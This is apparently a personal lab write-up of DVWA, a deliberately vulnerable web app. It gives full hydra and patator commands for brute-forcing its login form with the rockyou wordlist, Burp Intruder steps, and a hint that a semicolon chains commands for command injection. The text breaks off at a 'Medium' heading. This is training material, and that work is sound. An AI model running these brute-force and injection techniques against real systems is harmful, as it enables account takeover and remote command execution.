Install

digininja/DVWA

https://www.youtube.com/watch?v=6EbdPO3nPmo

Brute Force

Low

Hydra (failed)

$ hydra -l admin -P /usr/share/wordlists/rockyou.txt "http-get-form://10.1.1.92/vulnerabilities/brute/?:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie:PHPSESSID=4h0uedpbegdva5blbjtm85o5iq; security=low" -V -t4

Patador

$ patator http_fuzz url="<http://10.1.1.92/vulnerabilities/brute/?username=admin&password=FILE0&Login=Login>" method=GET header="Cookie:security=low;PHPSESSID=p3tije0mp93ane756j85ar5jbv" 0=/usr/share/wordlists/rockyou.txt -x ignore:fgrep="Username and/or password incorrect."
19:23:33 patator    INFO - Starting Patator 0.9 (<https://github.com/lanjelot/patator>) with python-3.8.6 at 2020-11-23 19:23 AEST
19:23:34 patator    INFO -                                                                              
19:23:34 patator    INFO - code size:clen       time | candidate                          |   num | mesg
19:23:34 patator    INFO - -----------------------------------------------------------------------------
19:23:34 patator    INFO - 200  4547:4275      0.004 | password                           |     4 | HTTP/1.1 200 OK

Burp Suite

  1. Proxy > Intercept tab

    1. Turn intercept off
    2. Open browser

    https://s3-us-west-2.amazonaws.com/secure.notion-static.com/cde40ae7-155a-4499-8c4c-cd51ee679870/Untitled.png

  2. Attempt login with user:password

  3. Proxy > HTTP history tab

    1. Find the GET request for the login attempt

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a28abd60-140c-43da-b442-5dd91e8546db/Untitled.png

    2. Check the details:

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/04abee9d-28b5-4074-83b6-bcc6bb050f42/Untitled.png

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a61b3e79-2bf4-4992-aa21-409efa5c867c/Untitled.png

    3. Right click the line, or click Actions, then Send to Intruder

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/4d574299-cfd0-44a8-8b14-f41c8b502929/Untitled.png

    4. Intruder > Positions tab. Set the payload positions (only attempt username admin)

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/684d5c02-8537-4a95-8233-388e6d7b3fe0/Untitled.png

    5. Intruder > Payloads tab. Load rockyou.txt.

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/35346041-6b6c-46b8-a9c1-fbf62cbff007/Untitled.png

    6. Start attack!

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/ef2a5837-a91a-4df6-865e-b93fa413cae9/Untitled.png

    7. Review the results. Look for different status codes or length.

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/25c92d0b-152c-4259-9384-6242d7e05fbf/Untitled.png

    8. Payload "password" has length 4566.

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/50fd7ce2-f2ae-48e9-817a-a83be6a8b411/Untitled.png

    9. Check in the browser.

      https://s3-us-west-2.amazonaws.com/secure.notion-static.com/8af47685-651b-4c37-b823-101661239525/Untitled.png

Command Injection

Remotely, find out the user of the web service on the OS, as well as the machines hostname via RCE.

Low

A semicolon can be used to chain multiple commands.

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/e08bcdf5-ec6b-4dc4-b2fa-fd85cda472e4/Untitled.png

Medium